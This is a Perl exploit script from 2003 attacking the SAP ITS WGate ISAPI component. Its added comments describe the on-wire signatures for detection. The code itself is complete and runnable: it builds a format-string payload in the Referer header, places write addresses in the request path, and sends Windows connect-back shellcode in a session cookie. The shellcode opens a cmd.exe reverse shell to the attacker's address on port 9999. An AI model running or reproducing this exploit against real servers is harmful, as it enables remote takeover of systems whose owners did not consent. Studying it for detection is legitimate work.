#!/usr/bin/perl -w
#
# Historical (2003) proof-of-concept against the SAP ITS WGate ISAPI
# component, as named in the banner printed below.  Kept as a reference
# for what the traffic looks like on the wire, which is the useful part
# for detection and incident review:
#
#   * a single HTTP/1.0 POST to /scripts/wgate/ whose request path,
#     Referer and Cookie headers carry raw non-printable bytes;
#   * a Referer several kilobytes long made of "%10.0f" / "%Nu%n"
#     printf-style directives (see $htv);
#   * a "~session" cookie whose value is binary rather than a token;
#   * Remote-Addr / Remote-Host request headers supplied by the client;
#   * on success, an outbound TCP connection from the target to the
#     address given as the 4th argument, on port 9999 (see the printf
#     below).
#
# The script runs under -w but without "use strict"; every variable is a
# package global, and send_HTTP() below reads $request from that scope.
#
use IO::Socket;
$|=1;                                   # unbuffered STDOUT so progress prints appear immediately

# Body of the POST; only its length matters to the construction below.
$cont= "Phenoelit SAP ITS WGate ISAPI exploit\n". "FX of Phenoelit , 2003\n\n";
print " * * * SAP ITS WGate 4.6/6.1 remote * * *\n". " --==]] Phenoelit - http://www.phenoelit.de/whatSAP/ [[==--\n". " by FX - 2003\n\n";

# Positional arguments, in order.  Nothing is validated except that the
# 5th one is present; see usage() for the example invocation.
$U_host=shift;                          # value for the HTTP Host header
$U_host_addr=shift;                     # address the TCP connection goes to
$U_host_port=shift;                     # TCP port, also echoed in the Server-Port model below
$U_self_addr=shift; # connect back addr
$U_self_name=shift; # Remote-Host/Remote-Addr value
$U_https=shift;                         # optional; ON/OFF string copied into the Https header model
$U_https="OFF" if (!defined($U_https));
if (!defined($U_self_name)) { &usage; exit 1; }

# NOTE(review): the match result is not checked.  If $U_self_addr is not
# a dotted quad, $1..$4 are undefined and the sprintf/printf below emit
# "uninitialized" warnings under -w instead of failing.
$U_self_addr=~/([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)/;
$conback=sprintf("%c%c%c%c",$1,$2,$3,$4); # the four octets as raw bytes
printf("Connecting back to %d.%d.%d.%d:9999\n",$1,$2,$3,$4);

# Connect-back payload bytes, reproduced unchanged.  This is the value
# that ends up in "Cookie: ~session=" and in the $BSTR model below.
$shellcode = ""; #"K"x1500;
$shellcode .= "el1t";
$shellcode .= "\xeb"."%25"."\x27\x0f";
$shellcode .= $conback;
$shellcode .= "\x02\x06\x6c\x59\x6c\x59\xf8\x1d".
"\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f\x33\x32".
"\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed\x2c".
"\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x78\x08".
"\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x4b\x1c\x01".
"\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20\x01\xfb\x31\xc9".
"\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31\xc2\xd1\xe2\x84\xc0".
"\x75\xf7\x0f\xb6\x45\x09\x8d\x44\x45\x08\x66\x39\x10\x75\xe1\x66".
"\x31\x10\x5a\x58\x5e\x56\x50\x52"."%2B"."\x4e\x10\x41\x0f\xb7\x0c\x4a".
"\x8b\x04\x88\x01\xf8\x0f\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09".
"\x75\xbe\xfe\x4d\x08\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0".
"\x89\xc7\x6a\x02\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x89\xce".
"\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff\xd0\x89\xc7\x55\x58\x66".
"\x89\x30\x6a\x10\x55\x57\xff\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8".
"\x55\x55\xff\x55\xec\x8d\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65".
"\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53".
"\x53\xfe\xca\x01\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1".
"\x08\x53\x53\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a".
"\xff\xff\x55\xe4";

#############################################################
##
## We need to calculate the number of characters written when
## the first %n is encountered.
##
#############################################################

# $BSTR is a local model of the header string the author expects the
# server to have assembled ahead of the Referer value.  It is never sent;
# only length($BSTR) is used, to seed $initial.  Whether it matches what
# any given server build actually produces cannot be told from here.
$BSTR = sprintf(
  "Content-Type: application/x-www-form-urlencoded\r\n".
  "Content-Length: %u\r\n".
  "Remote-Addr: %s\r\n". # client
  "Remote-Host: %s\r\n". # client
  "Server-Port: %s\r\n".
  "Https: %s\r\n".
  "Cookie: ~session=%s\r\n".
  "Host: %s\r\n".
  "Referer: http://localhost/",
  length($cont), $U_self_name, $U_self_name, $U_host_port, $U_https, $shellcode, $U_host);
print "PRE = ",length($BSTR),"\n";

# $htv becomes the tail of the Referer header: 710 copies of "%10.0f"
# (7100 characters) followed by the directives appended below.  This is
# the single most recognisable feature of the request on the wire.
$htv = "\%10.0f" x 710; # 10 chars per %f
$initial = length($BSTR) + (10*710) + 11; # What the IIS produces until %n
print "INI = ",$initial,"\n";
$add = 3; # What do we need to add ? MIN=3!  (overwritten on the next line)
$add = 0x141-($initial&0xFF); # We want 0x41 there, so calc it
print "ADD = ",$add,"\n";

### Arbitrary memory write using format string
$htv .= sprintf("_%%%uu_",$add);        # "%%" -> literal %, %u -> width; yields "_%<add>u_"
$htv .= "__\%08X_";
$htv .= "__\%n";
$htv .= "\%178u\%n";
$htv .= "\%10u\%n";
$htv .= "\%130u\%n";

#
# First stage shellcode as format string, starting from string
# counter value 0x??????7F
#
$htv .= "%361u%n%24u%n%256u%n%256u%n%256u%n%351u%n%240u%n%256u%n%256u%n%256u%n%256u%n%376u%n%64u%n%443u%n%66u%n%252u%n%256u%n%393u%n%348u%n%156u%n%252u%n%131u%n%357u%n%263u%n%197u%n%323u%n%256u%n%143u%n%330u%n%414u%n%265u%n%81u%n%256u%n%256u%n%256u%n%442u%n%230u%n";

# 37 pairs of fixed 4-byte values that are appended to the URI path via
# $service below.  Together with the leading entries in $service they are
# why the request line contains non-printable bytes.
$codeaddr = "\x01\xF0\xFD\x7F". "\x41\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x42\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x43\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x44\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x45\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x46\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x47\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x48\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x49\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x4A\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x4B\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x4C\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x4D\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x4E\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x4F\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x50\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x51\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x52\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x53\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x54\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x55\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x56\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x57\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x58\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x59\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x5A\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x5B\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x5C\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x5D\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x5E\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x5F\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x60\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x61\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x62\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x63\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x64\xF3\xFD\x7F".
"\x01\xF0\xFD\x7F". "\x65\xF3\xFD\x7F".
"";

# Path component appended to /scripts/wgate/ in the request line.
$service="AAA".
"\x24\xF0\xFD\x7F". # Write address
"\x01\xF0\xFD\x7F". # dummy
"\x25\xF0\xFD\x7F". # Write address
"\x01\xF0\xFD\x7F". # dummy
"\x26\xF0\xFD\x7F". # Write address
"\x01\xF0\xFD\x7F". # dummy
"\x27\xF0\xFD\x7F". # Write address
$codeaddr.
"";
$URI="/scripts/wgate/".$service;

# The complete request as written to the socket by send_HTTP().  Note the
# HTTP/1.0 version, the Referer = "http://localhost/" . $htv, and the
# binary cookie value; Remote-Addr/Remote-Host are NOT sent here, they
# only appear in the $BSTR length model above.
$request = "POST ".$URI." HTTP/1.0\r\n".
"Host: ".$U_host."\r\n".
"Referer: http://localhost/".$htv."\r\n".
"Cookie: ~session=".$shellcode."\r\n".
"Content-type: application/x-www-form-urlencoded\r\n".
"Content-length: ".length($cont)."\r\n\r\n".
$cont;

&send_HTTP($U_host_addr,$U_host_port);
exit 0;

#
# SUB
#

# send_HTTP($dest, $port)
#   Opens a TCP connection to $dest:$port, writes the package-global
#   $request to it, echoes every line the server sends back to STDOUT
#   and closes the socket.  Dies if the connection cannot be made; the
#   underlying socket error (IO::Socket leaves it in $@) is not included
#   in the message.  Returns nothing meaningful.
sub send_HTTP {
  my $remote;
  my $rline;
  my $dest;
  my $port;
  ($dest,$port) = @_;
  $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$dest,PeerPort=>"$port",);
  unless ($remote) { die "cannot connect to http daemon on $dest" }
  $remote->autoflush(1);
  print $remote $request;                       # $request is the global built above
  while ( $rline=<$remote> ) { print $rline; }  # relay the response verbatim
  close $remote;
}

# usage()
#   Prints the invocation synopsis to STDOUT.  The first line shows only
#   the optional trailing {OFF|ON} flag; the five positional argument
#   names that presumably preceded it look to have been lost (likely
#   angle-bracketed placeholders dropped when this copy was extracted),
#   so the example line is the reliable reference for argument order.
sub usage {
  print "$0 [{OFF|ON}]\n\n".
  "Example: \n".
  "$0 webshop.company.com 1.2.3.4 80 10.1.1.2 10.7.2.3\n".
  "";
}